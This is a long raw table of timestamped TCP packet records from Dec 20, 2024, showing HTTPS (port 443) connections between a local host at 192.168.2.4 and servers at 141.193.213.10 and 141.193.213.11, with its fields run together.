                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.017445087 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.018289089 CET44349867141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.018484116 CET49867443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.018512964 CET44349867141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.023087978 CET44349867141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.023154974 CET49867443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.023489952 CET49867443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.023576975 CET49867443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.023590088 CET44349867141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.023705006 CET44349867141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.030441046 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.030510902 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.044356108 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.044418097 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.047380924 CET44349866141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.050786972 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.050867081 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.051948071 CET49864443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.051948071 CET49866443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.051950932 CET49865443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.051975965 CET44349866141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.062912941 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.062982082 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.066772938 CET49867443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.066787958 CET44349867141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.076004982 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.076066971 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.083096981 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.083165884 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.095539093 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.095613956 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.097002983 CET49866443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.108576059 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.108644962 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111064911 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111192942 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111243963 CET49860443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111263990 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111358881 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111409903 CET49860443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111423969 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111517906 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111603022 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111658096 CET49860443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111671925 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111707926 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111737967 CET49860443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111758947 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111771107 CET44349861141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111795902 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111829042 CET49859443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111845970 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111856937 CET44349861141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111859083 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111898899 CET49859443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111907959 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111917973 CET44349861141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111970901 CET49859443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111975908 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.111979008 CET49861443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.112029076 CET44349861141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.112173080 CET49861443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.112178087 CET44349861141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.112222910 CET49861443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.112346888 CET49867443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.114094019 CET49861443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.114135027 CET44349861141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.118876934 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.119915009 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.119946957 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.119996071 CET49859443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.120003939 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.120043039 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.120070934 CET49859443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.120079994 CET49859443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.120264053 CET49859443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.120275021 CET44349859141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.120559931 CET49870443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.120635986 CET44349870141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.120718002 CET49870443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.121289968 CET49870443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.121318102 CET44349870141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.121443033 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.121511936 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.124427080 CET49871443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.124444962 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.124511957 CET49871443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.124686956 CET49871443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.124697924 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.127667904 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.127733946 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.132046938 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.132180929 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.132184982 CET49860443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.132210016 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.132256985 CET49860443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.132298946 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.132427931 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.132482052 CET49860443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.132680893 CET49860443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.132708073 CET44349860141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.132940054 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.132994890 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.133060932 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.133541107 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.133574009 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.139628887 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.139700890 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.148096085 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.148154974 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.148205996 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.148478985 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.148535967 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.148628950 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.148654938 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.148858070 CET49873443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.148947954 CET44349873141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.149091005 CET49873443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.149631977 CET49873443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.149667978 CET44349873141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.151247025 CET44349862141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.151384115 CET44349862141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.151444912 CET49862443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.151463032 CET44349862141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.151730061 CET44349862141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.151793003 CET49862443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.152894020 CET49862443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.152915001 CET44349862141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.153181076 CET49874443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.153217077 CET44349874141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.153283119 CET49874443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.153892040 CET49874443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.153918982 CET44349874141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.319473982 CET44349863141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.319539070 CET44349863141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.319585085 CET44349863141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.319632053 CET44349863141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.319628000 CET49863443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.319695950 CET44349863141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.319756031 CET49863443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.319775105 CET44349863141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.319798946 CET44349863141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.319833040 CET49863443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.319855928 CET49863443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.321203947 CET49863443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.321234941 CET44349863141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.321647882 CET49875443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.321701050 CET44349875141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.321784973 CET49875443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.322366953 CET49875443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.322395086 CET44349875141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.446511030 CET44349864141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.446738958 CET44349864141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.446820974 CET49864443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.447264910 CET49864443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.447299004 CET44349864141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.447659969 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.447691917 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.447782993 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.448106050 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.448121071 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.449964046 CET44349866141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.450069904 CET44349866141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.450129986 CET44349866141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.450187922 CET49866443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.451167107 CET49866443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.451180935 CET44349866141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.451421022 CET49877443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.451493025 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.451570034 CET49877443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.451870918 CET49877443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.451905012 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.454237938 CET44349865141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.454365015 CET44349865141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.454423904 CET49865443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.454452991 CET44349865141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.454480886 CET44349865141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.454530954 CET49865443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.454572916 CET44349865141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.454708099 CET44349865141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.454761982 CET49865443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.455610037 CET49865443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.455627918 CET44349865141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.455878019 CET49878443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.455903053 CET44349878141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.456088066 CET49878443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.456382036 CET49878443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.456396103 CET44349878141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.471057892 CET44349867141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.471182108 CET44349867141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.471237898 CET49867443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.471255064 CET44349867141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.471395969 CET44349867141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.471538067 CET49867443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.471550941 CET44349867141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.471662045 CET44349867141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.471714973 CET49867443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.471931934 CET49867443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.471949100 CET44349867141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.472114086 CET49879443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.472183943 CET44349879141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.472294092 CET49879443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.472532034 CET49879443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:59.472570896 CET44349879141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.105174065 CET44349869141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.105473042 CET49869443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.105489969 CET44349869141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.105937958 CET44349869141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.106333971 CET49869443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.106375933 CET44349868141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.106400967 CET44349869141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.106479883 CET49869443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.106643915 CET49868443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.106705904 CET44349868141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.107882977 CET44349868141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.108216047 CET49868443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.108315945 CET49868443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.108342886 CET44349868141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.108452082 CET44349868141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.147349119 CET44349869141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.162421942 CET49868443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.335684061 CET44349870141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.337412119 CET49870443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.337436914 CET44349870141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.338005066 CET44349870141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.338805914 CET49870443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.338938951 CET44349870141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.338975906 CET49870443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.344295025 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.344594002 CET49871443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.344624996 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.345443010 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.346061945 CET49871443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.346139908 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.346350908 CET49871443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.352864027 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.353122950 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.353188038 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.354288101 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.354877949 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.355012894 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.355026007 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.355082035 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.366966963 CET44349873141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.367253065 CET49873443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.367295027 CET44349873141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.370908976 CET44349873141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.370980978 CET49873443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.371216059 CET44349874141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.371480942 CET49873443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.371499062 CET49874443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.371516943 CET44349874141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.371548891 CET49873443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.371555090 CET44349873141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.371651888 CET44349873141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.375139952 CET44349874141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.375212908 CET49874443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.375483036 CET49874443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.375581980 CET49874443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.375592947 CET44349874141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.375654936 CET44349874141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.379333973 CET44349870141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.381057024 CET49870443192.168.2.4141.193.213.10
